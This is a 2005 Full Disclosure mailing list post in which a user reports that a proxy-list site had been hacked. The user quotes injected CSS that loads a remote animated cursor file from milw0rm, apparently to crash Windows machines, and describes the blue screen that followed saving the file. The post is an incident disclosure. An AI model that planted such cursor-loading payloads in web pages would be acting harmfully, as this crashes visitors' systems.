Full Disclosure mailing list archives

Animated Cursor Blue Screen?

From: "CrYpTiC MauleR" <crypticmauler () linuxmail org>
Date: Thu, 06 Jan 2005 02:33:21 -0500

When going to a bookmarked site which hosts public proxy lists I found out the site was hacked. There was a
meta-refresh to the attackers website, when viewing the sourcode of the hacked webpage I noticed this....

[style type="text/css"]
body {CURSOR: url("http://www.milw0rm.com/sploits/KERNELBLUE.ani";)}
[/style]

I was viewing the site in Firefox and Firefox as far as I remember does not support animated cursors as of yet. I saved
that file on my computer to check  it out later. Only later did I realize it was a bad idea, whenever I tried accessing
the directory that file was saved I got a blue screen (Windows 2000) I was able to delete the file using a command
prompt. I am assuming the atacker meant for the computer to crash upon the cursor loading which failed (hooray for
Firefox). Has anyone seen this before? I did a brief search on Google for such an exploit but did not come across any.
I am assuming the crash could be done with any file type. Thanks for the input!

Regards,
Nick